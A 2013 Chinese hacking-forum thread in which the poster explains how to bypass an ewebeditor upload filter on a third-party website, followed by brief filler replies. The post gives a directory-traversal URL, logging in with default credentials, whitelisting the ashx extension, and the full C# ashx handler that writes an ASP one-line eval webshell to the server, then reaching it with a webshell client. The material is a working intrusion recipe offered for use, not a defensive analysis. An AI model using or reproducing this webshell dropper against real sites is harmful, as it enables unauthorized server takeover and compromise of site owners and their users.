查看: 2772|回复: 25

突破上传过滤一招,利用ashx

[复制链接]
发表于 2013-2-15 10:41:37 | 显示全部楼层 |阅读模式

前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,
正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。

用自动扫描脚本扫描出敏感目录
inc/ewebeditor/admin_login.asp
既然有ewebeditor编辑器那就尝试下编辑器漏洞把。

/inc/ewebeditor/admin/upload.asp?id=6&d_viewmode=list&dir=../


直接遍历来了。

使用默认密码登录ewebeditor后台,新添加样式,本想很容易解决。
上传免杀小马

加密一句话也是一样的结果。

那我们怎么解决之个问题呢-
首先在编辑器样式的上传文件添加ashx后缀
在上传我们的Ashx马。

<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {     public void ProcessRequest (HttpContext context) {        context.Response.ContentType = "text/plain";         StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));        file1.Write("<%eval request(\"a\")%>");        file1.Flush();        file1.Close();     }     public bool IsReusable {        get {            return false;        }    } }



接下来访问http://www.xxx.com/UploadFile/eWebEditor/201329112155838.ashx

会在eWebEditor生成一个m.asp文件(一句话木马)

用菜刀访问http://www.xxx.com/UploadFile/eWebEditor/m.asp

就突破了
&#8203;&#8203;


发表于 2013-2-17 00:36:31 | 显示全部楼层
我假装认真地工作,老板假装认真地付薪水  
发表于 2013-2-17 03:06:28 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2013-2-22 19:30:05 | 显示全部楼层
感謝樓主  
发表于 2013-2-23 05:41:41 | 显示全部楼层
先看看怎么样!  
发表于 2014-10-4 21:05:39 | 显示全部楼层
我假装认真地工作,老板假装认真地付薪水  
发表于 2014-10-15 13:40:58 | 显示全部楼层
长时间没来看了 ~~  
发表于 2014-12-26 14:07:00 | 显示全部楼层
呵呵 哪天得看看 `~~~~  
发表于 2015-1-26 19:04:35 | 显示全部楼层
越办越好~~~~~~~~~`  
发表于 2015-2-28 20:25:34 | 显示全部楼层
都是那么过来的  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则